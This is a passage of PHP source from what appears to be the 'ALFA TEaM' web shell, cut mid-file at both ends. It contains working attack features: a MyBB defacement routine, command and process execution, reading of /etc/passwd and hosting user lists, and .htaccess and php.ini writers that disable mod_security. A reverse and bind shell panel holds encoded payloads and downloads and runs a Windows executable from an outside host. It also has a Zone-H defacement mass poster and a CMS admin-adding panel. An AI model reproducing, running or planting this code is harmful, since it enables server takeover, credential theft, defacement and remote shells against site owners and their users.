            echo "<br><div class='txtfont'>| Your Index |</div><br>\r\n<textarea name=mybbindex rows='19' cols='103'>\r\n<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
            if (isset($_POST['alfa6'])) {
                $mybb_dbh = $_POST['alfa6'];
                $mybb_dbu = $_POST['alfa7'];
                $mybb_dbn = $_POST['alfa8'];
                $mybb_dbp = $_POST['alfa9'];
                $mybb_index = $_POST['alfa10'];
                if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) {
                    $conn = @mysqli_connect($mybb_dbh, $mybb_dbu, $mybb_dbp, $mybb_dbn) or die(mysqli_error($conn));
                    $prefix = "mybb_";
                    $loli7 = "UPDATE mybb_templates SET template='" . $mybb_index . "' WHERE title='index'";
                    $result = @mysqli_query($conn, $loli7) or die(mysqli_error($conn));
                    __alert('MyBB index changed...!');
                }
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfaproc()
    {
        alfahead();
        echo "<Div class=header><br><center>";
        if (empty($_POST['ajax']) && !empty($_POST['alfa1'])) {
            $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = false;
        }
        if ($GLOBALS['sys'] == "win") {
            $process = array("Task List" => "tasklist /V", "System Info" => "systeminfo", "Active Connections" => "netstat -an", "Running Services" => "net start", "User Accounts" => "net user", "Show Computers" => "net view", "ARP Table" => "arp -a", "IP Configuration" => "ipconfig /all");
        } else {
            $process = array("Process status" => "ps aux", "Syslog" => "cat /etc/syslog.conf", "Resolv" => "cat /etc/resolv.conf", "Hosts" => "cat /etc/hosts", "Cpuinfo" => "cat /proc/cpuinfo", "Version" => "cat /proc/version", "Sbin" => "ls -al /usr/sbin", "Interrupts" => "cat /proc/interrupts", "lsattr" => "lsattr -va", "Uptime" => "uptime", "Fstab" => "cat /etc/fstab");
        }
        foreach ($process as $n => $link) {
            echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\'' . $link . '\')"> | ' . $n . ' | </a>';
        }
        echo "</center><br>";
        if (!empty($_POST['alfa1'])) {
            echo "<pre class='ml1' style='margin-top:5px' >";
            if ($GLOBALS["glob_chdir_false"] && !empty($_POST["c"])) {
                $cmd = "cd '" . addslashes($_POST["c"]) . "';";
            }
            echo alfaEx($cmd . $_POST['alfa1'], true);
            echo "</pre>";
        }
        echo "</div>";
        alfafooter();
    }
    function alfasafe()
    {
        alfahead();
        echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
        echo "<h3><a href=javascript:void(0) onclick=\"g('safe',null,'php.ini',null)\">| PHP.INI | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,'ini')\">| .htaccess(apache) | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,'pl')\">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,'passwd')\">| Read-Passwd | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,'users')\">| Read-Users | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,null,'valiases')\">| Get-User | </a><a href=javascript:void(0) onclick=\"g('safe',null,null,null,null,null,null,null,null,'domains')\">| Get-Domains | </a></center></h3>";
        if (!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains') {
            if (!_alfa_file_exists("/etc/virtual/domainowners")) {
                echo __pre();
                $solevisible9 = _alfa_file('/etc/named.conf');
                if (is_array($solevisible9)) {
                    foreach ($solevisible9 as $solevisible13) {
                        if (@eregi('zone', $solevisible13)) {
                            preg_match_all('#zone "(.*)"#', $solevisible13, $solevisible14);
                            if (strlen(trim($solevisible14[1][0])) > 2) {
                                echo $solevisible14[1][0] . '<br>';
                            }
                        }
                    }
                }
            } else {
                echo __pre();
                $users = _alfa_file("/etc/virtual/domainowners");
                if (is_array($users)) {
                    foreach ($users as $boz) {
                        $dom = explode(":", $boz);
                        echo $dom[0] . "\n";
                    }
                }
            }
        }
        if (!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases') {
            echo "\r\n<form onsubmit=\"g('safe',null,null,null,null,null,null,'valiases',this.site.value,null,'>>'); return false;\" method=\"post\" /><center><div class=\"txtfont\">Url: </font><input type=\"text\" placeholder=\"site.com\" name=\"site\" /> <input type=\"submit\" value=\" \" name=\"go\" /></form></center>";
            if (isset($_POST['alfa9']) && $_POST['alfa9'] == '>>') {
                if (!_alfa_file_exists("/etc/virtual/domainowners")) {
                    $site = trim($_POST['alfa7']);
                    $rep = str_replace(array("https://", "http://", "www."), "", $site);
                    $user = "";
                    if (function_exists("posix_getpwuid") && function_exists("fileowner")) {
                        if ($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))) {
                            $user = $user['name'];
                        }
                    } else {
                        if (_alfa_can_runCommand(true, true)) {
                            $user = alfaEx("stat -c '%U' /etc/valiases/" . $rep);
                        }
                    }
                    if (!empty($user) && $user != 'root') {
                        echo __pre() . "<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
                    } else {
                        echo __pre() . '<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';
                    }
                } else {
                    $site = trim($_POST['alfa7']);
                    $rep = str_replace(array("https://", "http://", "www."), "", $site);
                    $users = _alfa_file("/etc/virtual/domainowners");
                    foreach ($users as $boz) {
                        $ex = explode(":", $boz);
                        if ($ex[0] == $rep) {
                            echo __pre() . "<center><table border='1'>\r\n<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">" . trim($ex[1]) . "</font></b></td></tr>\r\n<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
                            break;
                        }
                    }
                }
            }
        }
        if (!empty($_POST['alfa5']) && isset($_POST['alfa5'])) {
            if (!_alfa_file_exists("/etc/virtual/domainowners")) {
                echo __pre();
                $i = 0;
                while ($i < 60000) {
                    $line = @posix_getpwuid($i);
                    if (!empty($line)) {
                        while (list($key, $vl) = each($line)) {
                            echo $vl . "\n";
                            break;
                        }
                    }
                    $i++;
                }
            } else {
                echo __pre();
                $users = _alfa_file("/etc/virtual/domainowners");
                foreach ($users as $boz) {
                    $user = explode(":", $boz);
                    echo trim($user[1]) . '<br>';
                }
            }
        }
        if (!empty($_POST['alfa4']) && isset($_POST['alfa4'])) {
            echo __pre();
            if (_alfa_can_runCommand(true, true)) {
                echo __read_file("/etc/passwd");
            } elseif (function_exists("posix_getpwuid")) {
                for ($uid = 0; $uid < 60000; $uid++) {
                    $ara = @posix_getpwuid($uid);
                    if (!empty($ara)) {
                        while (list($key, $val) = each($ara)) {
                            echo "{$val}:";
                        }
                        echo "\n";
                    }
                }
            } else {
                __alert('failed...');
            }
        }
        if (!empty($_POST['alfa2']) && isset($_POST['alfa2'])) {
            @__write_file($GLOBALS['cwd'] . ".htaccess", "#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
            echo "<center><b><big>htaccess for Apache created...!</center></b></big>";
        }
        if (!empty($_POST['alfa1']) && isset($_POST['alfa1'])) {
            @__write_file($GLOBALS['cwd'] . "php.ini", "safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
            echo "<center><b><big> php.ini created...!</center></b></big>";
        }
        if (!empty($_POST['alfa3']) && isset($_POST['alfa3'])) {
            @__write_file($GLOBALS['cwd'] . ".htaccess", "#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
            echo "<center><b><big>htaccess for Litespeed created...!</center></b></big>";
        }
        echo "<br></div>";
        alfafooter();
    }
    function __get_resource($content)
    {
        return @gzinflate(__ZGVjb2Rlcg($content));
    }
    function __write_file($file, $content)
    {
        if ($fh = @fopen($file, "wb")) {
            if (fwrite($fh, $content) !== false) {
                return true;
            }
        }
        return false;
    }
    function bcinit($evalType, $evalCode, $evalOptions, $evalArguments)
    {
        $res = "<font color='green'>[ Success...! ]</font>";
        $err = "<font color='red'>[ Failed...! ]</font>";
        if ($evalOptions != "") {
            $evalOptions .= " ";
        }
        if ($evalArguments != "") {
            $evalArguments = " " . $evalArguments;
        }
        if ($evalType == "c") {
            $tmpdir = ALFA_TEMPDIR;
            chdir($tmpdir);
            if (is_writable($tmpdir)) {
                $uniq = substr(md5(time()), 0, 8);
                $filename = $evalType . $uniq . ".c";
                $path = $filename;
                if (__write_file($path, $evalCode)) {
                    $ext = $GLOBALS['sys'] == 'win' ? ".exe" : ".out";
                    $pathres = $filename . $ext;
                    $evalOptions = "-o " . $pathres . " " . $evalOptions;
                    $cmd = "gcc " . $evalOptions . $path;
                    alfaEx($cmd);
                    if (is_file($pathres)) {
                        if (chmod($pathres, 0755)) {
                            $cmd = $pathres . $evalArguments;
                            alfaEx($cmd);
                        } else {
                            $res = $err;
                        }
                        unlink($pathres);
                    } else {
                        $res = $err;
                    }
                    unlink($path);
                } else {
                    $res = $err;
                }
            }
            return $res;
        } elseif ($evalType == "java") {
            $tmpdir = ALFA_TEMPDIR;
            chdir($tmpdir);
            if (is_writable($tmpdir)) {
                if (preg_match("/class\\ ([^{]+){/i", $evalCode, $r)) {
                    $classname = trim($r[1]);
                    $filename = $classname;
                } else {
                    $uniq = substr(md5(time()), 0, 8);
                    $filename = $evalType . $uniq;
                    $evalCode = "class " . $filename . " { " . $evalCode . " } ";
                }
                $path = $filename . ".java";
                if (__write_file($path, $evalCode)) {
                    $cmd = "javac " . $evalOptions . $path;
                    alfaEx($cmd);
                    $pathres = $filename . ".class";
                    if (is_file($pathres)) {
                        if (chmod($pathres, 0755)) {
                            $cmd = "java " . $filename . $evalArguments;
                            alfaEx($cmd);
                        } else {
                            $res = $err;
                        }
                        unlink($pathres);
                    } else {
                        $res = $err;
                    }
                    unlink($path);
                } else {
                    $res = $err;
                }
            }
            return $res;
        }
        return false;
    }
    function alfaconnect()
    {
        alfahead();
        $php = "7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
        $python = "pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
        $perl = "lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
        $ruby = "tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
        $node = "nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
        $c = "tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
        $java = "lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
        echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
        echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">\r\n<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
        $cbArr = array("php" => "Php", "perl" => "Perl", "python" => "Python", "ruby" => "Ruby", "c" => "C", "java" => "Java", "node" => "NodeJs", "bcwin" => "Windows");
        foreach ($cbArr as $key => $val) {
            echo "<option value='{$key}' " . ($GLOBALS['sys'] == 'win' ? 'selected' : '') . ">{$val}</option>";
        }
        echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
        if (isset($_POST['alfa1']) && !empty($_POST['alfa1'])) {
            $lang = $_POST['alfa1'];
            $ip = $_POST['alfa2'];
            $port = $_POST['alfa3'];
            $arg = $_POST['alfa4'] == 'bind' ? $port : $port . ' ' . $ip;
            $tmpdir = ALFA_TEMPDIR;
            $name = "ALFA_TEMPDIR/" . $lang . uniqid() . rand(1, 99999);
            $allow = array('perl', 'ruby', 'python', 'node');
            eval('$lan=$' . $lang . ';');
            if (in_array($lang, $allow)) {
                if (__write_file($name, __get_resource($lan))) {
                    if (_alfa_can_runCommand(true, true)) {
                        $os = $GLOBALS['sys'] != 'win' ? '1>/dev/null 2>&1 &' : '';
                        $out = alfaEx("{$lang} {$name} {$arg} {$os}");
                        if ($out == '') {
                            $out = "<font color='green'><center>[ Finished...! ]</center></font>";
                        }
                        echo "<pre class='ml1' style='margin-top:5px'>{$out}</pre>";
                    }
                } else {
                    echo "<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>";
                }
            }
            if ($lang == 'java' || $lang == 'c') {
                $code = __get_resource($lan);
                $out = nl2br(bcinit($lang, $code, '', ''));
                echo "<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>";
            }
            if ($lang == 'bcwin') {
                $alfa = new AlfaCURL();
                $s = $alfa->Send('http://solevisible.com/bc/windows.exe');
                $tmpdir = ALFA_TEMPDIR;
                $f = @fopen("ALFA_TEMPDIR/bcwin.exe", 'w+');
                @fwrite($f, $s);
                @fclose($f);
                $out = alfaEx("ALFA_TEMPDIR/bcwin.exe " . $_POST['alfa2'] . " " . $_POST['alfa3']);
            }
            if ($lang == 'php') {
                echo "<pre class=ml1 style='margin-top:5px'>";
                $code = __get_resource($lan);
                if ($code !== false) {
                    $code = "\$target = \"" . $arg . "\";\n" . $code;
                    eval($code);
                    echo "<center><font color='green'>[ Finished...! ]</font></center>";
                }
                echo "</pre>";
            }
        }
        echo "</div>";
        alfafooter();
    }
    function alfazoneh()
    {
        alfahead();
        echo "<div class=header>";
        if (!function_exists('curl_version')) {
            echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
        }
        $hackmode = array('known vulnerability (i.e. unpatched system)', 'undisclosed (new) vulnerability', 'configuration / admin. mistake', 'brute force attack', 'social engineering', 'Web Server intrusion', 'Web Server external module intrusion', 'Mail Server intrusion', 'FTP Server intrusion', 'SSH Server intrusion', 'Telnet Server intrusion', 'RPC Server intrusion', 'Shares misconfiguration', 'Other Server intrusion', 'SQL Injection', 'URL Poisoning', 'File Inclusion', 'Other Web Application bug', 'Remote administrative panel access bruteforcing', 'Remote administrative panel access password guessing', 'Remote administrative panel access social engineering', 'Attack against administrator(password stealing/sniffing)', 'Access credentials through Man In the Middle attack', 'Remote service password guessing', 'Remote service password bruteforce', 'Rerouting after attacking the Firewall', 'Rerouting after attacking the Router', 'DNS attack through social engineering', 'DNS attack through cache poisoning', 'Not available', 'Cross-Site Scripting');
        $reason = array('Heh...just for fun!', 'Revenge against that website', 'Political reasons', 'As a challenge', 'I just want to be the best defacer', 'Patriotism', 'Not available');
        echo "\r\n<center><br><div class=\"txtfont_header\">| Zone-h Mass Poster |</div><center><br>\r\n<form action=\"\" method=\"post\" onsubmit=\"g('zoneh',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,'>>'); return false;\">\r\n<input type=\"text\" name=\"defacer\" size=\"67\" id=\"text\" placeholder=\"ALFA TEaM 2012\" />\r\n<br>\r\n<select id=\"text\" name=\"hackmode\" style=\"width:400px;\">";
        $x = 1;
        foreach ($hackmode as $mode) {
            echo '<option style="background-color: rgb(F, F, F);" value="' . $x . '">' . $mode . '</option>';
            $x++;
        }
        echo "</select><br><select id=\"text\" name=\"reason\" style=\"width:200px;\">";
        $x = 1;
        foreach ($reason as $mode) {
            echo '<option style="background-color: rgb(F, F, F);" value="' . $x . '">' . $mode . '</option>';
            $x++;
        }
        echo "</select><br>\r\n<textarea name=\"domain\" cols=\"90\" rows=\"20\" placeholder=\"Domains...\"></textarea><br>\r\n<p><input type=\"submit\" value=\" \" name=\"go\" /></p>\r\n</form></center>";
        if ($_POST['alfa5'] && $_POST['alfa5'] == '>>') {
            ob_start();
            $hacker = $_POST['alfa1'];
            $method = $_POST['alfa2'];
            $neden = $_POST['alfa3'];
            $site = $_POST['alfa4'];
            if (empty($hacker)) {
                die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
            } elseif ($method == "------------------------------------SELECT-------------------------------------") {
                die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
            } elseif ($neden == "------------------------------------SELECT-------------------------------------") {
                die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
            } elseif (empty($site)) {
                die(__pre() . "<center><b><font color =\"#FF0000\">[+] YOU MUST INTER THE SITES LIST [+]<font></b></center>");
            }
            $i = 0;
            $sites = explode("\n", $site);
            $alfa = new AlfaCURL();
            while ($i < count($sites)) {
                if (substr($sites[$i], 0, 4) != "http") {
                    $sites[$i] = "http://" . $sites[$i];
                }
                $alfa->Send("http://www.zone-h.com/notify/single", "post", "defacer=" . $hacker . "&domain1=" . $sites[$i] . "&hackmode=" . $method . "&reason=" . $neden);
                ++$i;
            }
            echo __pre() . "<center><font color =\"#00A220\"><b>[+] Sending Sites To Zone-H Has Been Completed Successfully !!![+]</b><font></center>";
        }
        echo "</div>";
        alfafooter();
    }
    function alfapwchanger()
    {
        alfahead();
        echo "<div class=header><center><br><div class=\"txtfont_header\">| Add New Admin |</div>\r\n<center><h3>";
        $vals = array('WordPress' => array('wp', 2), 'Joomla' => array('joomla', 3), 'vBulletin' => array('vb', 5), 'phpBB' => array('phpbb', 6), 'WHMCS' => array('whmcs', 7), 'MyBB' => array('mybb', 8), 'Php Nuke' => array('nuke', 9), 'Drupal' => array('drupal', 10), 'SMF' => array('smf', 11));
        Alfa_Create_A_Tag('pwchanger', $vals);
        echo "</h3></center>";
        if (isset($_POST['alfa1']) && $_POST['alfa1'] == 'wp') {
            echo __pre() . '<center><center><div class="txtfont_header">| WordPress |</div>
<p>' . getConfigHtml('wp') . '</p><form onSubmit="g(\'pwchanger\',null,\'wp\',\'>>\',this.localhost.value,this.database.value,this.username.value,this.password.value,null,this.admin.value,this.email.value,this.prefix.value);return false;" method="POST">';
